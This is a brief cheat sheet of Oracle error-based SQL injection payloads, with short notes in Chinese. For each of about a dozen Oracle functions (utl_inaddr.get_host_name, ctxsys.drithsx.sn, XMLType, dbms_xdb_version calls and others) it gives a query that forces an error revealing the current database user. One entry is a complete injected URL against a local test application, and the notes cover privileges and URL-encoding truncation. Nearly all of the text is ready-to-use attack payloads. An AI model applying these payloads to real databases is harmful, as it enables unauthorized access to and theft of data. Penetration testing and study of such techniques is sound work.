utl_inaddr.get_host_name
select utl_inaddr.get_host_name((select user from dual)) from dual;
11g之後,使用此函數的資料庫用戶需要有訪問網絡的權限
ctxsys.drithsx.sn
select ctxsys.drithsx.sn(1, (select user from dual)) from dual;
處理文本的函數,參數錯誤時會報錯。
CTXSYS.CTX_REPORT.TOKEN_TYPE
select CTXSYS.CTX_REPORT.TOKEN_TYPE((select user from dual), '123') from dual;
XMLType
http://localhost:8080/oracleInject/index?username=admin' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --
注意url編碼,如果返回的數據有空格的話,它會自動截斷,導致數據不完整,這種情況下先轉為 hex,再導出。
dbms_xdb_version.checkin
select dbms_xdb_version.checkin((select user from dual)) from dual;
dbms_xdb_version.makeversioned
select dbms_xdb_version.makeversioned((select user from dual)) from dual;
dbms_xdb_version.uncheckout
select dbms_xdb_version.uncheckout((select user from dual)) from dual;
dbms_utility.sqlid_to_sqlhash
SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual;
ordsys.ord_dicom.getmappingxpath
select ordsys.ord_dicom.getmappingxpath((select user from dual), 1, 1) from dual;
UTL_INADDR.get_host_name
select UTL_INADDR.get_host_name((select user from dual)) from dual;
UTL_INADDR.get_host_address
select UTL_INADDR.get_host_name('~'||(select user from dual)||'~') from dual;